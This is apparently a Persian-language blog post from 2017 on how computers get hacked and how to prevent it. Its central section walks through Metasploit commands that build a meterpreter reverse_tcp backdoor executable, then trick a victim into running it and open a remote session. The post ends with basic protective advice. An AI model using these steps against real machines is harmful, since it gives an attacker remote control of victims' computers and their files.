هک کامپیوتر با روشهای متفاوت نفوذی و جلوگیری از هک شدن

نرم افزار اتصال گوشی به تلویزیون
نرم افزار اتصال گوشی به تلویزیون پخش فیلم ، موزیک و عکس
جولای 25, 2017
خرابی دکمه هوم آیفون را چگونه می توان درست کرد ؟
جولای 26, 2017

هک کامپیوتر با روشهای متفاوت نفوذی و جلوگیری از هک شدن

هک کامپیوتر

هک کامپیوتر

هک کامپیوتر و واژه هک و جاسوسی ، امروزه یکی از پرکاربردترین واژه ها و کارهایی است که  در دنیای تکنولوژی دنبال می شود افراد بسیار زیادی به دنبال روش های هک و نفوذ به سیستم های کامپیوتری می باشند.

با توجه به خواسته های بیشمار افراد که به دنبال یافتن راهی برای هک دیگران و البته جلوگیری از هک سیستم های خودشان، باعث می شوند اهمیت بیشتری به این موضوع بدهند.

اما به طور کلی هک کامپیوتر به چه شیوه ای انجام می شود و از چه راهی می توان به سیستم کامپیوتری که به آن دسترسی نداریم نفوذ کنیم؟

اکثر افراد آشنایی زیادی با واژه هک ندارند، با این حال علاقه زیادی دارند که به علت های شخصی به اطلاعات دیگران دسا پیدا کنند. شما می توانید به مطالعه مطالب پیشین ما  که در رابطه با انواع عمل هک و هکرهای مختلف می باشد بپردازید .

پس ازاینکه دانستید هکرها  چه کسانی هستند و شناسایی اهداف آن ها برای ه چیست ، نوبت به شناسایی روش های هک و نفوذ به سیستم های کامپیوتری می باشد.

روشی که بیشتربرای هک کامپیوتر استفاده می شود دسترسی به کامپیوتر و اطلاعات فرد قربانی از طریق شبکه یا اینترنت می باشد. از این طریق هکر با استفاده از یک برنامه یا لینک های آلوده، اقدام به هک کامپیوتر فرد می نماید. انواع روش های هک کامپیوتر در ادامه ذکر شده است.

هک  کامپیوتر با استفاده از لینک های آلوده

روش دیگری برای هک کامپیوتر و نفوذ به آن،راغب کردن کاربر قربانی به کلیک بروی لینک های آلوده است دربا این روش، اقدام به جذب کاربر برای کلیک روی لینک آلوده می کند.

برای مثال هکر با وعده هایی  توخالی و وسوسه انگیز نظیر نمایش فیلمی مخفی از افراد مشهور یا وعده ی شرکت در قرعه کشی، برای کاربر به نوعی دام پهن می نماید و از آن طریق کاربر را مجاب می کند که روی لینک مخرب کلیک نماید. پس از کلیک روی این لینک برنامه ای در پشت پرده اقدام به سرقت اطلاعات کاربر خواهد نمود.

هک با استفاده از IP و بطور مستقیم

یکی از سخت ترین روش های هک کامپیوتر که هکرهای معمولی قادر به انجام آن نیستند، روش هک به صورت مستقیم و بدون استفاده از برنامه ای خاص می باشد. هکرهایی که از این روش استفاده می کنند از دانش برنامه نویسی بسیار بالایی بهره مند هستند که با استفاده از سیستم عامل کالی لینوکس یا بکترک لینوکس، به سیستم قربانی در شبکه متصل می شوند و سپس آن را هک می کنند. از آنجایی که این هکرها دانش بالایی در این زمینه دارند، می دانند که سیستم قربانی از چه قسمت هایی آسیب پذیر می باشد و از همان قسمت ها استفاده کرده و به سیستم نفوذ می کنند.

هک کامپیوتر به وسیله کالی لینوکس

هکرها به راحتی می توانند سیستم کامپیوتر شما را با استفاده از کالی لینوکس هک نمایند، اکنون این روش را برای شما توضیح خواهیم داد تا ببینید هکرها چگونه به سادگی سیستم شما را هک می کنند و بتوانید از هک کامپیوتر خود جلوگیری نمایید.

در اولین مرحله هکر سیستم کالی لینوکس خود را باز می کند، سپس وارد محیط ترمینال لینوکس می شود. بعد از آن برای وارد شدن به محیط متاسپلوییت دستور msfconsole را وارد می کند.

در مرحله دوم با استفاده از دستور msfpayload windows/meterpreter/reverse_tcp LHOST=SourceIPAdress X > Desktop/Backdoor.exe به جای آدرس آی پی LHOST آدرس آی پی سیستم خود را قرار می دهند. با انجام این مرحله هکر می تواند یک در پشتی در سیستم کالی لینوکس بسازد.

اکنون باید فرد مورد نظر خود را ترغیب کند که روی فایل ساخته شده کلیک نماید. هکرها این کار را با استفاده از شیوه های مهندسی اجتماعی انجام می دهند و معمولا هم موفق می شوند که قربانی را وادار به کلیک برروی فایل ایجاد شده کنند.

بعد از انجام مراحل بالا هکر در همان خط فرمانی که هست دستور use exploit/multi/handler را وارد می کند. و سپس خط جدید دستور set payload windows/meterpreter/reverse_tcp را نیز وارد می کند. حال همان آدرس آی پی خود را با دستور set lhost IPAdress در قسمت IPAdress قرار می دهد. بعد از اتمام این مراحل عبارت exploit -j –z را وارد نموده تا ماژول handler شروع به کار کند.

زمانی که شما به عنوان قربانی برنامه ای که هکر ساخته است را اجرا نمایید در محیط متااسپلوییت یک آلارم با موضوع این که یک نشست جدید در برنامه ایجاد شده است نمایش داده می شود. هکر برای ایجاد ارتباط با این نشست دستور sessions -i 1 را وارد می کند.

اکنون دیگر کار تمام است و اولین نشست هکر با سیستم شما برقرار می شود. بعد از این مرحله هکر به تمام اطلاعات شما دسترسی پیدا کرده و می تواند هر فایلی را که بخواهد باز کرده و ببیند.

جلوگیری از هک کامپیوتر

همانطور که مشاهده نمودید سیستم شما همیشه در معرض هک شدن قرار دارد و هکرها به راحتی و حتی با داشتن دانشی اندک می توانند به سیستم شما نفوذ کرده و به تمام اطلاعات شما دسترسی پیدا کنند.

بنابراین برای جلوگیری از هک کامپیوتر خود می بایست اول از همه برنامه های ضد هک و آنتی ویروس هایی را بر روی سیستم خود نصب نمایید که بتوانند برنامه های مخرب را تشخیص داده و از هک شدن سیستم شما جلوگیری کنند. یکی از این برنامه ها، نرم افزار Anti Spy می باشد که برای کسب اطلاعات بیشتر درباره این نرم افزار می توانید به لینک مربوطه مراجعه کنید.

علاوه بر این نیز باید مراقب فایل ها و لینک هایی که برایتان ارسال می شود باشید و برروی لینک های ناشناخته و مشکوک کلیک ننمایید. همچنین از دانلود برنامه ها از منابع ناشناخته و نامعتبر به شدت خودداری کرده و برنامه های مورد نیاز خود را از منابع معتبر مانند گوگل پلی دانلود نمایید.

در آخر هم به بدیهی ترین چیز برای جلوگیری از هک کامپیوتر یعنی گذاشتن پسورد کامپیوتر و همچنین قرار ندادن آن در اختیار افراد غریبه توجه کنید.

بازدیدها: 0

دیدگاهتان را بنویسید